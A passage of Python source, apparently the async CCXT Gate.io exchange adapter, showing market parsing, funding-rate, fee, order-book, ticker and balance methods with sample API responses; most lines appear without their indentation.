quote = self.safe_currency_code(quoteId)
settle = self.safe_currency_code(settleId)
expiry = self.safe_timestamp(market, 'expire_time')
symbol = ''
marketType = 'swap'
if date is not None:
symbol = base + '/' + quote + ':' + settle + '-' + self.yymmdd(expiry, '')
marketType = 'future'
else:
symbol = base + '/' + quote + ':' + settle
priceDeviate = self.safe_string(market, 'order_price_deviate')
markPrice = self.safe_string(market, 'mark_price')
minMultiplier = Precise.string_sub('1', priceDeviate)
maxMultiplier = Precise.string_add('1', priceDeviate)
minPrice = Precise.string_mul(minMultiplier, markPrice)
maxPrice = Precise.string_mul(maxMultiplier, markPrice)
takerPercent = self.safe_string(market, 'taker_fee_rate')
makerPercent = self.safe_string(market, 'maker_fee_rate', takerPercent)
isLinear = quote == settle
return {
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'settle': settle,
'baseId': baseId,
'quoteId': quoteId,
'settleId': settleId,
'type': marketType,
'spot': False,
'margin': False,
'swap': marketType == 'swap',
'future': marketType == 'future',
'option': marketType == 'option',
'active': True,
'contract': True,
'linear': isLinear,
'inverse': not isLinear,
'taker': self.parse_number(Precise.string_div(takerPercent, '100')), # Fee is in %, so divide by 100
'maker': self.parse_number(Precise.string_div(makerPercent, '100')),
'contractSize': self.safe_number(market, 'quanto_multiplier'),
'expiry': expiry,
'expiryDatetime': self.iso8601(expiry),
'strike': None,
'optionType': None,
'precision': {
'amount': self.parse_number('1'),
'price': self.safe_number(market, 'order_price_round'),
},
'limits': {
'leverage': {
'min': self.safe_number(market, 'leverage_min'),
'max': self.safe_number(market, 'leverage_max'),
},
'amount': {
'min': self.safe_number(market, 'order_size_min'),
'max': self.safe_number(market, 'order_size_max'),
},
'price': {
'min': self.parse_number(minPrice),
'max': self.parse_number(maxPrice),
},
'cost': {
'min': None,
'max': None,
},
},
'info': market,
}
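        # For example, per the parsing above: a perpetual named 'BTC_USDT' settled in
        # 'usdt' becomes the unified symbol 'BTC/USDT:USDT', while a delivery contract
        # 'BTC_USDT_20200814' expiring on 2020-08-14 becomes 'BTC/USDT:USDT-200814'.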
async def fetch_option_markets(self, params={}):
result = []
underlyings = await self.fetch_option_underlyings()
for i in range(0, len(underlyings)):
underlying = underlyings[i]
query = params
query['underlying'] = underlying
response = await self.publicOptionsGetContracts(query)
#
# [
# {
# "orders_limit": "50",
# "order_size_max": "100000",
# "mark_price_round": "0.1",
# "order_size_min": "1",
# "position_limit": "1000000",
# "orderbook_id": "575967",
# "order_price_deviate": "0.9",
# "is_call": True, # True means Call False means Put
# "last_price": "93.9",
# "bid1_size": "0",
# "bid1_price": "0",
# "taker_fee_rate": "0.0004",
# "underlying": "BTC_USDT",
# "create_time": "1646381188",
# "price_limit_fee_rate": "0.1",
# "maker_fee_rate": "0.0004",
# "trade_id": "727",
# "order_price_round": "0.1",
# "settle_fee_rate": "0.0001",
# "trade_size": "1982",
# "ref_rebate_rate": "0",
# "name": "BTC_USDT-20220311-44000-C",
# "underlying_price": "39194.26",
# "strike_price": "44000",
# "multiplier": "0.0001",
# "ask1_price": "0",
# "ref_discount_rate": "0",
# "expiration_time": "1646985600",
# "mark_price": "12.15",
# "position_size": "4",
# "ask1_size": "0",
# "tag": "WEEK"
# }
# ]
#
for i in range(0, len(response)):
market = response[i]
id = self.safe_string(market, 'name')
parts = underlying.split('_')
baseId = self.safe_string(parts, 0)
quoteId = self.safe_string(parts, 1)
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
expiry = self.safe_timestamp(market, 'expiration_time')
strike = self.safe_string(market, 'strike_price')
isCall = self.safe_value(market, 'is_call')
optionLetter = 'C' if isCall else 'P'
optionType = 'call' if isCall else 'put'
symbol = symbol + ':' + quote + '-' + self.yymmdd(expiry) + ':' + strike + ':' + optionLetter
priceDeviate = self.safe_string(market, 'order_price_deviate')
markPrice = self.safe_string(market, 'mark_price')
minMultiplier = Precise.string_sub('1', priceDeviate)
maxMultiplier = Precise.string_add('1', priceDeviate)
minPrice = Precise.string_mul(minMultiplier, markPrice)
maxPrice = Precise.string_mul(maxMultiplier, markPrice)
takerPercent = self.safe_string(market, 'taker_fee_rate')
makerPercent = self.safe_string(market, 'maker_fee_rate', takerPercent)
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'settle': quote,
'baseId': baseId,
'quoteId': quoteId,
'settleId': quoteId,
'type': 'option',
'spot': False,
'margin': False,
'swap': False,
'future': False,
'option': True,
'active': True,
'contract': True,
'linear': True,
'inverse': False,
'taker': self.parse_number(Precise.string_div(takerPercent, '100')), # Fee is in %, so divide by 100
'maker': self.parse_number(Precise.string_div(makerPercent, '100')),
'contractSize': self.parse_number('1'),
'expiry': expiry,
'expiryDatetime': self.iso8601(expiry),
'strike': strike,
'optionType': optionType,
'precision': {
'amount': self.parse_number('1'),
'price': self.safe_number(market, 'order_price_round'),
},
'limits': {
'leverage': {
'min': None,
'max': None,
},
'amount': {
'min': self.safe_number(market, 'order_size_min'),
'max': self.safe_number(market, 'order_size_max'),
},
'price': {
'min': self.parse_number(minPrice),
'max': self.parse_number(maxPrice),
},
'cost': {
'min': None,
'max': None,
},
},
'info': market,
})
return result
async def fetch_option_underlyings(self):
underlyingsResponse = await self.publicOptionsGetUnderlyings()
#
# [
# {
# "index_time": "1646915796",
# "name": "BTC_USDT",
# "index_price": "39142.73"
# }
# ]
#
underlyings = []
for i in range(0, len(underlyingsResponse)):
underlying = underlyingsResponse[i]
name = self.safe_string(underlying, 'name')
if name is not None:
underlyings.append(name)
return underlyings
def prepare_request(self, market=None, type=None, params={}):
"""
* @ignore
Fills request params contract, settle, currency_pair, market and account where applicable
:param dict market: CCXT market, required when type is None
:param str type: 'spot', 'swap', or 'future', required when market is None
:param dict params: request parameters
:returns: the api request object, and the new params object with non-needed parameters removed
"""
# * Do not call for multi spot order methods like cancelAllOrders and fetchOpenOrders. Use multiOrderSpotPrepareRequest instead
request = {}
if market is not None:
if market['contract']:
request['contract'] = market['id']
request['settle'] = market['settleId']
else:
request['currency_pair'] = market['id']
else:
swap = type == 'swap'
future = type == 'future'
if swap or future:
defaultSettle = 'usdt' if swap else 'btc'
settle = self.safe_string_lower(params, 'settle', defaultSettle)
params = self.omit(params, 'settle')
request['settle'] = settle
return [request, params]
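        # For example: for a contract market the request is filled with 'contract' and
        # 'settle', for a spot market with 'currency_pair', and prepare_request(None,
        # 'swap', {}) returns [{'settle': 'usdt'}, {}] (the default settle for swaps,
        # 'btc' being the default for futures).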
def spot_order_prepare_request(self, market=None, stop=False, params={}):
"""
* @ignore
Fills request params currency_pair, market and account where applicable for spot order methods like fetchOpenOrders, cancelAllOrders
:param dict market: CCXT market
:param bool stop: True if for a stop order
:param dict params: request parameters
:returns: the api request object, and the new params object with non-needed parameters removed
"""
marginMode, query = self.get_margin_mode(stop, params)
request = {}
if not stop:
if market is None:
raise ArgumentsRequired(self.id + ' spotOrderPrepareRequest() requires a market argument for non-stop orders')
request['account'] = marginMode
request['currency_pair'] = market['id'] # Should always be set for non-stop
return [request, query]
def multi_order_spot_prepare_request(self, market=None, stop=False, params={}):
"""
* @ignore
Fills request params currency_pair, market and account where applicable for spot order methods like fetchOpenOrders, cancelAllOrders
:param dict market: CCXT market
:param bool stop: True if for a stop order
:param dict params: request parameters
:returns: the api request object, and the new params object with non-needed parameters removed
"""
marginMode, query = self.get_margin_mode(stop, params)
request = {
'account': marginMode,
}
if market is not None:
if stop:
                # gateio spot and margin stop orders use the term 'market' instead of 'currency_pair', and 'normal' instead of 'spot'. Neither parameter is used when fetching or cancelling a single order; they are used when creating a single stop order, but createOrder does not call this method
request['market'] = market['id']
else:
request['currency_pair'] = market['id']
return [request, query]
def get_margin_mode(self, stop, params):
"""
* @ignore
        Gets the margin mode for this API call
:param bool stop: True if for a stop order
:param dict params: Request params
        :returns: The marginMode and the updated request params with marginMode removed; the marginMode value is what the "account" property specified in gateio's API docs expects
"""
defaultMarginMode = self.safe_string_lower_2(self.options, 'defaultMarginMode', 'marginMode', 'spot') # 'margin' is isolated margin on gateio's api
marginMode = self.safe_string_lower_2(params, 'marginMode', 'account', defaultMarginMode)
params = self.omit(params, ['marginMode', 'account'])
if marginMode == 'cross':
marginMode = 'cross_margin'
elif marginMode == 'isolated':
marginMode = 'margin'
elif marginMode == '':
marginMode = 'spot'
if stop:
if marginMode == 'spot':
# gateio spot stop orders use the term normal instead of spot
marginMode = 'normal'
if marginMode == 'cross_margin':
raise BadRequest(self.id + ' getMarginMode() does not support stop orders for cross margin')
return [marginMode, params]
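        # Mapping examples: 'cross' -> 'cross_margin', 'isolated' -> 'margin', missing or
        # '' -> 'spot'; for stop orders 'spot' is renamed to 'normal' (gateio's term) and
        # cross margin stop orders are rejected with BadRequest.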
def get_settlement_currencies(self, type, method):
options = self.safe_value(self.options, type, {}) # ['BTC', 'USDT'] unified codes
fetchMarketsContractOptions = self.safe_value(options, method, {})
defaultSettle = ['usdt'] if (type == 'swap') else ['btc']
return self.safe_value(fetchMarketsContractOptions, 'settlementCurrencies', defaultSettle)
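        # With the defaults declared in describe() this returns ['usdt', 'btc'] for both
        # swap and future; when the option is not set it falls back to ['usdt'] for swap
        # and ['btc'] for future.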
async def fetch_currencies(self, params={}):
# sandbox/testnet only supports future markets
apiBackup = self.safe_value(self.urls, 'apiBackup')
if apiBackup is not None:
return None
response = await self.publicSpotGetCurrencies(params)
#
# {
# "currency": "BCN",
# "delisted": False,
# "withdraw_disabled": True,
# "withdraw_delayed": False,
# "deposit_disabled": True,
# "trade_disabled": False
# }
#
result = {}
# TODO: remove magic constants
amountPrecision = self.parse_number('1e-6')
for i in range(0, len(response)):
entry = response[i]
currencyId = self.safe_string(entry, 'currency')
currencyIdLower = self.safe_string_lower(entry, 'currency')
code = self.safe_currency_code(currencyId)
delisted = self.safe_value(entry, 'delisted')
withdrawDisabled = self.safe_value(entry, 'withdraw_disabled', False)
depositDisabled = self.safe_value(entry, 'deposit_disabled', False)
tradeDisabled = self.safe_value(entry, 'trade_disabled', False)
withdrawEnabled = not withdrawDisabled
depositEnabled = not depositDisabled
tradeEnabled = not tradeDisabled
listed = not delisted
active = listed and tradeEnabled and withdrawEnabled and depositEnabled
result[code] = {
'id': currencyId,
'lowerCaseId': currencyIdLower,
'name': None,
'code': code,
'precision': amountPrecision,
'info': entry,
'active': active,
'deposit': depositEnabled,
'withdraw': withdrawEnabled,
'fee': None,
'fees': [],
'limits': self.limits,
}
return result
async def fetch_funding_rate(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
if not market['swap']:
raise BadSymbol(self.id + ' fetchFundingRate() supports swap contracts only')
request, query = self.prepare_request(market, None, params)
response = await self.publicFuturesGetSettleContractsContract(self.extend(request, query))
#
# [
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
# ]
#
return self.parse_funding_rate(response)
async def fetch_funding_rates(self, symbols=None, params={}):
await self.load_markets()
request, query = self.prepare_request(None, 'swap', params)
response = await self.publicFuturesGetSettleContracts(self.extend(request, query))
#
# [
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
# ]
#
result = self.parse_funding_rates(response)
return self.filter_by_array(result, 'symbol', symbols)
def parse_funding_rate(self, contract, market=None):
#
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
#
marketId = self.safe_string(contract, 'name')
symbol = self.safe_symbol(marketId, market)
markPrice = self.safe_number(contract, 'mark_price')
indexPrice = self.safe_number(contract, 'index_price')
interestRate = self.safe_number(contract, 'interest_rate')
fundingRate = self.safe_number(contract, 'funding_rate')
fundingTime = self.safe_integer(contract, 'funding_next_apply') * 1000
fundingRateIndicative = self.safe_number(contract, 'funding_rate_indicative')
return {
'info': contract,
'symbol': symbol,
'markPrice': markPrice,
'indexPrice': indexPrice,
'interestRate': interestRate,
'estimatedSettlePrice': None,
'timestamp': None,
'datetime': None,
'fundingRate': fundingRate,
'fundingTimestamp': fundingTime,
'fundingDatetime': self.iso8601(fundingTime),
'nextFundingRate': fundingRateIndicative,
'nextFundingTimestamp': None,
'nextFundingDatetime': None,
'previousFundingRate': None,
'previousFundingTimestamp': None,
'previousFundingDatetime': None,
}
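        # Note: 'funding_next_apply' is a Unix timestamp in seconds, hence the * 1000
        # above, and 'funding_rate_indicative' is surfaced as the next funding rate.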
async def fetch_network_deposit_address(self, code, params={}):
await self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
}
response = await self.privateWalletGetDepositAddress(self.extend(request, params))
addresses = self.safe_value(response, 'multichain_addresses')
currencyId = self.safe_string(response, 'currency')
code = self.safe_currency_code(currencyId)
result = {}
for i in range(0, len(addresses)):
entry = addresses[i]
#
# {
# "chain": "ETH",
# "address": "0x359a697945E79C7e17b634675BD73B33324E9408",
# "payment_id": "",
# "payment_name": "",
# "obtain_failed": "0"
# }
#
obtainFailed = self.safe_integer(entry, 'obtain_failed')
if obtainFailed:
continue
network = self.safe_string(entry, 'chain')
address = self.safe_string(entry, 'address')
tag = self.safe_string(entry, 'payment_id')
tagLength = len(tag)
tag = tag if tagLength else None
result[network] = {
'info': entry,
'code': code,
'address': address,
'tag': tag,
}
return result
async def fetch_deposit_address(self, code, params={}):
await self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
}
response = await self.privateWalletGetDepositAddress(self.extend(request, params))
#
# {
# "currency": "XRP",
# "address": "rHcFoo6a9qT5NHiVn1THQRhsEGcxtYCV4d 391331007",
# "multichain_addresses": [
# {
# "chain": "XRP",
# "address": "rHcFoo6a9qT5NHiVn1THQRhsEGcxtYCV4d",
# "payment_id": "391331007",
# "payment_name": "Tag",
# "obtain_failed": 0
# }
# ]
# }
#
currencyId = self.safe_string(response, 'currency')
code = self.safe_currency_code(currencyId)
addressField = self.safe_string(response, 'address')
tag = None
address = None
if addressField.find(' ') >= 0:
splitted = addressField.split(' ')
address = splitted[0]
tag = splitted[1]
else:
address = addressField
return {
'info': response,
'code': code,
'address': address,
'tag': tag,
'network': None,
}
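        # Example from the payload above: "rHcFoo6a9qT5NHiVn1THQRhsEGcxtYCV4d 391331007"
        # is split on the space into the address and the tag/payment id '391331007'.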
async def fetch_trading_fee(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'currency_pair': market['id'],
}
response = await self.privateWalletGetFee(self.extend(request, params))
#
# {
# "user_id": 1486602,
# "taker_fee": "0.002",
# "maker_fee": "0.002",
# "gt_discount": True,
# "gt_taker_fee": "0.0015",
# "gt_maker_fee": "0.0015",
# "loan_fee": "0.18",
# "point_type": "0",
# "futures_taker_fee": "0.0005",
# "futures_maker_fee": "0"
# }
#
return self.parse_trading_fee(response, market)
async def fetch_trading_fees(self, params={}):
await self.load_markets()
response = await self.privateWalletGetFee(params)
#
# {
# "user_id": 1486602,
# "taker_fee": "0.002",
# "maker_fee": "0.002",
# "gt_discount": True,
# "gt_taker_fee": "0.0015",
# "gt_maker_fee": "0.0015",
# "loan_fee": "0.18",
# "point_type": "0",
# "futures_taker_fee": "0.0005",
# "futures_maker_fee": "0"
# }
#
return self.parse_trading_fees(response)
def parse_trading_fees(self, response):
result = {}
for i in range(0, len(self.symbols)):
symbol = self.symbols[i]
market = self.market(symbol)
result[symbol] = self.parse_trading_fee(response, market)
return result
def parse_trading_fee(self, info, market=None):
#
# {
# "user_id": 1486602,
# "taker_fee": "0.002",
# "maker_fee": "0.002",
# "gt_discount": True,
# "gt_taker_fee": "0.0015",
# "gt_maker_fee": "0.0015",
# "loan_fee": "0.18",
# "point_type": "0",
# "futures_taker_fee": "0.0005",
# "futures_maker_fee": "0"
# }
#
contract = self.safe_value(market, 'contract')
takerKey = 'futures_taker_fee' if contract else 'taker_fee'
makerKey = 'futures_maker_fee' if contract else 'maker_fee'
return {
'info': info,
'symbol': self.safe_string(market, 'symbol'),
'maker': self.safe_number(info, makerKey),
'taker': self.safe_number(info, takerKey),
}
async def fetch_transaction_fees(self, codes=None, params={}):
await self.load_markets()
response = await self.privateWalletGetWithdrawStatus(params)
#
# {
# "currency": "MTN",
# "name": "Medicalchain",
# "name_cn": "Medicalchain",
# "deposit": "0",
# "withdraw_percent": "0%",
# "withdraw_fix": "900",
# "withdraw_day_limit": "500000",
# "withdraw_day_limit_remain": "500000",
# "withdraw_amount_mini": "900.1",
# "withdraw_eachtime_limit": "90000000000",
# "withdraw_fix_on_chains": {
# "ETH": "900"
# }
# }
#
withdrawFees = {}
for i in range(0, len(response)):
entry = response[i]
currencyId = self.safe_string(entry, 'currency')
code = self.safe_currency_code(currencyId)
withdrawFees[code] = {}
withdrawFix = self.safe_value(entry, 'withdraw_fix_on_chains')
if withdrawFix is None:
withdrawFix = {}
withdrawFix[code] = self.safe_number(entry, 'withdraw_fix')
keys = list(withdrawFix.keys())
for i in range(0, len(keys)):
key = keys[i]
withdrawFees[code][key] = self.parse_number(withdrawFix[key])
return {
'info': response,
'withdraw': withdrawFees,
'deposit': {},
}
async def fetch_funding_history(self, symbol=None, since=None, limit=None, params={}):
await self.load_markets()
# defaultType = 'future'
market = None
if symbol is not None:
market = self.market(symbol)
type, query = self.handle_market_type_and_params('fetchFundingHistory', market, params)
request, requestParams = self.prepare_request(market, type, query)
request['type'] = 'fund' # 'dnw' 'pnl' 'fee' 'refr' 'fund' 'point_dnw' 'point_fee' 'point_refr'
if since is not None:
request['from'] = since / 1000
if limit is not None:
request['limit'] = limit
method = self.get_supported_mapping(type, {
'swap': 'privateFuturesGetSettleAccountBook',
'future': 'privateDeliveryGetSettleAccountBook',
})
response = await getattr(self, method)(self.extend(request, requestParams))
#
# [
# {
# "time": 1646899200,
# "change": "-0.027722",
# "balance": "11.653120591841",
# "text": "XRP_USDT",
# "type": "fund"
# },
# ...
# ]
#
return self.parse_funding_histories(response, symbol, since, limit)
def parse_funding_histories(self, response, symbol, since, limit):
result = []
for i in range(0, len(response)):
entry = response[i]
funding = self.parse_funding_history(entry)
result.append(funding)
sorted = self.sort_by(result, 'timestamp')
return self.filter_by_symbol_since_limit(sorted, symbol, since, limit)
def parse_funding_history(self, info, market=None):
#
# {
# "time": 1646899200,
# "change": "-0.027722",
# "balance": "11.653120591841",
# "text": "XRP_USDT",
# "type": "fund"
# }
#
timestamp = self.safe_timestamp(info, 'time')
marketId = self.safe_string(info, 'text')
market = self.safe_market(marketId, market)
return {
'info': info,
'symbol': self.safe_string(market, 'symbol'),
'code': self.safe_string(market, 'settle'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'id': None,
'amount': self.safe_number(info, 'change'),
}
async def fetch_order_book(self, symbol, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
#
# request = {
# 'currency_pair': market['id'],
# 'interval': '0', # depth, 0 means no aggregation is applied, default to 0
# 'limit': limit, # maximum number of order depth data in asks or bids
# 'with_id': True, # return order book ID
# }
#
request, query = self.prepare_request(market, None, params)
method = self.get_supported_mapping(market['type'], {
'spot': 'publicSpotGetOrderBook',
'margin': 'publicSpotGetOrderBook',
'swap': 'publicFuturesGetSettleOrderBook',
'future': 'publicDeliveryGetSettleOrderBook',
})
if limit is not None:
request['limit'] = limit # default 10, max 100
request['with_id'] = True
response = await getattr(self, method)(self.extend(request, query))
#
# SPOT
#
# {
# "id": 6358770031
# "current": 1634345973275,
# "update": 1634345973271,
# "asks": [
# ["2.2241","12449.827"],
# ["2.2242","200"],
# ["2.2244","826.931"],
# ["2.2248","3876.107"],
# ["2.225","2377.252"],
# ["2.22509","439.484"],
# ["2.2251","1489.313"],
# ["2.2253","714.582"],
# ["2.2254","1349.784"],
# ["2.2256","234.701"]],
# "bids": [
# ["2.2236","32.465"],
# ["2.2232","243.983"],
# ["2.2231","32.207"],
# ["2.223","449.827"],
# ["2.2228","7.918"],
# ["2.2227","12703.482"],
# ["2.2226","143.033"],
# ["2.2225","143.027"],
# ["2.2224","1369.352"],
# ["2.2223","756.063"]
# ]
# }
#
# Perpetual Swap
#
# {
# "id": 6358770031
# "current": 1634350208.745,
# "asks": [
# {"s": 24909, "p": "61264.8"},
# {"s": 81, "p": "61266.6"},
# {"s": 2000, "p": "61267.6"},
# {"s": 490, "p": "61270.2"},
# {"s": 12, "p": "61270.4"},
# {"s": 11782, "p": "61273.2"},
# {"s": 14666, "p": "61273.3"},
# {"s": 22541, "p": "61273.4"},
# {"s": 33, "p": "61273.6"},
# {"s": 11980, "p": "61274.5"}
# ],
# "bids": [
# {"s": 41844, "p": "61264.7"},
# {"s": 13783, "p": "61263.3"},
# {"s": 1143, "p": "61259.8"},
# {"s": 81, "p": "61258.7"},
# {"s": 2471, "p": "61257.8"},
# {"s": 2471, "p": "61257.7"},
# {"s": 2471, "p": "61256.5"},
# {"s": 3, "p": "61254.2"},
# {"s": 114, "p": "61252.4"},
# {"s": 14372, "p": "61248.6"}
# ],
# "update": 1634350208.724
# }
#
timestamp = self.safe_integer(response, 'current')
if not market['spot']:
timestamp = timestamp * 1000
priceKey = 0 if market['spot'] else 'p'
amountKey = 1 if market['spot'] else 's'
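        # spot books are lists of [price, amount] strings while contract books are dicts
        # with 'p' (price) and 's' (size), hence the different keys; contract timestamps
        # ('current') are in seconds and were scaled to milliseconds above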
nonce = self.safe_integer(response, 'id')
result = self.parse_order_book(response, symbol, timestamp, 'bids', 'asks', priceKey, amountKey)
result['nonce'] = nonce
return result
async def fetch_ticker(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
request, query = self.prepare_request(market, None, params)
method = self.get_supported_mapping(market['type'], {
'spot': 'publicSpotGetTickers',
'margin': 'publicSpotGetTickers',
'swap': 'publicFuturesGetSettleTickers',
'future': 'publicDeliveryGetSettleTickers',
})
response = await getattr(self, method)(self.extend(request, query))
ticker = self.safe_value(response, 0)
return self.parse_ticker(ticker, market)
def parse_ticker(self, ticker, market=None):
#
# SPOT
#
# {
# "currency_pair": "KFC_USDT",
# "last": "7.255",
# "lowest_ask": "7.298",
# "highest_bid": "7.218",
# "change_percentage": "-1.18",
# "base_volume": "1219.053687865",
# "quote_volume": "8807.40299875455",
# "high_24h": "7.262",
# "low_24h": "7.095"
# }
#
# LINEAR/DELIVERY
#
# {
# "contract": "BTC_USDT",
# "last": "6432",
# "low_24h": "6278",
# "high_24h": "6790",
# "change_percentage": "4.43",
# "total_size": "32323904",
# "volume_24h": "184040233284",
# "volume_24h_btc": "28613220",
# "volume_24h_usd": "184040233284",
# "volume_24h_base": "28613220",
# "volume_24h_quote": "184040233284",
# "volume_24h_settle": "28613220",
# "mark_price": "6534",
# "funding_rate": "0.0001",
# "funding_rate_indicative": "0.0001",
# "index_price": "6531"
# }
#
marketId = self.safe_string_2(ticker, 'currency_pair', 'contract')
symbol = self.safe_symbol(marketId, market)
last = self.safe_string(ticker, 'last')
ask = self.safe_string(ticker, 'lowest_ask')
bid = self.safe_string(ticker, 'highest_bid')
high = self.safe_string(ticker, 'high_24h')
low = self.safe_string(ticker, 'low_24h')
baseVolume = self.safe_string_2(ticker, 'base_volume', 'volume_24h_base')
quoteVolume = self.safe_string_2(ticker, 'quote_volume', 'volume_24h_quote')
percentage = self.safe_string(ticker, 'change_percentage')
return self.safe_ticker({
'symbol': symbol,
'timestamp': None,
'datetime': None,
'high': high,
'low': low,
'bid': bid,
'bidVolume': None,
'ask': ask,
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': percentage,
'average': None,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
}, market, False)
async def fetch_tickers(self, symbols=None, params={}):
await self.load_markets()
type, query = self.handle_market_type_and_params('fetchTickers', None, params)
request, requestParams = self.prepare_request(None, type, query)
method = self.get_supported_mapping(type, {
'spot': 'publicSpotGetTickers',
'margin': 'publicSpotGetTickers',
'swap': 'publicFuturesGetSettleTickers',
'future': 'publicDeliveryGetSettleTickers',
})
response = await getattr(self, method)(self.extend(request, requestParams))
return self.parse_tickers(response, symbols)
def fetch_balance_helper(self, entry):
account = self.account()
account['used'] = self.safe_string_2(entry, 'freeze', 'locked')
account['free'] = self.safe_string(entry, 'available')
account['total'] = self.safe_string(entry, 'total')
return account
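        # Note: 'freeze' (cross margin) or 'locked' (spot/margin) maps to used,
        # 'available' to free and 'total' to the unified total.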
async def fetch_balance(self, params={}):
"""
:param dict params: exchange specific parameters
:param str params['type']: spot, margin, swap or future, if not provided self.options['defaultType'] is used
:param str params['settle']: 'btc' or 'usdt' - settle currency for perpetual swap and future - default="usdt" for swap and "btc" for future
:param str params['marginMode']: 'cross' or 'isolated' - marginMode for margin trading if not provided self.options['defaultMarginMode'] is used
:param str params['symbol']: margin only - unified ccxt symbol
"""
await self.load_markets()
symbol = self.safe_string(params, 'symbol')
params = self.omit(params, 'symbol')
type, query = self.handle_market_type_and_params('fetchBalance', None, params)
request, requestParams = self.prepare_request(None, type, query)
marginMode, requestQuery = self.get_margin_mode(False, requestParams)
if symbol is not None:
market = self.market(symbol)
request['currency_pair'] = market['id']
method = self.get_supported_mapping(type, {
'spot': self.get_supported_mapping(marginMode, {
'spot': 'privateSpotGetAccounts',
'margin': 'privateMarginGetAccounts',
'cross_margin': 'privateMarginGetCrossAccounts',
}),
'funding': 'privateMarginGetFundingAccounts',
'swap': 'privateFuturesGetSettleAccounts',
'future': 'privateDeliveryGetSettleAccounts',
})
response = await getattr(self, method)(self.extend(request, requestQuery))
contract = (type == 'swap' or type == 'future')
if contract:
response = [response]
#
# Spot / margin funding
#
# [
# {
# "currency": "DBC",
# "available": "0",
# "locked": "0"
# "lent": "0", # margin funding only
# "total_lent": "0" # margin funding only
# },
# ...
# ]
#
# Margin
#
# [
# {
# "currency_pair": "DOGE_USDT",
# "locked": False,
# "risk": "9999.99",
# "base": {
# "currency": "DOGE",
# "available": "0",
# "locked": "0",
# "borrowed": "0",
# "interest": "0"
# },
# "quote": {
# "currency": "USDT",
# "available": "0.73402",
# "locked": "0",
# "borrowed": "0",
# "interest": "0"
# }
# },
# ...
# ]
#
# Cross margin
#
# {
# "user_id": 10406147,
# "locked": False,
# "balances": {
# "USDT": {
# "available": "1",
# "freeze": "0",
# "borrowed": "0",
# "interest": "0"
# }
# },
# "total": "1",
# "borrowed": "0",
# "interest": "0",
# "risk": "9999.99"
# }
#
# Perpetual Swap
#
# {
# order_margin: "0",
# point: "0",
# bonus: "0",
# history: {
# dnw: "2.1321",
# pnl: "11.5351",
# refr: "0",
# point_fee: "0",
# fund: "-0.32340576684",
# bonus_dnw: "0",
# point_refr: "0",
# bonus_offset: "0",
# fee: "-0.20132775",
# point_dnw: "0",
# },
# unrealised_pnl: "13.315100000006",
# total: "12.51345151332",
# available: "0",
# in_dual_mode: False,
# currency: "USDT",
# position_margin: "12.51345151332",
# user: "6333333",
# }
#
# Delivery Future
#
# {
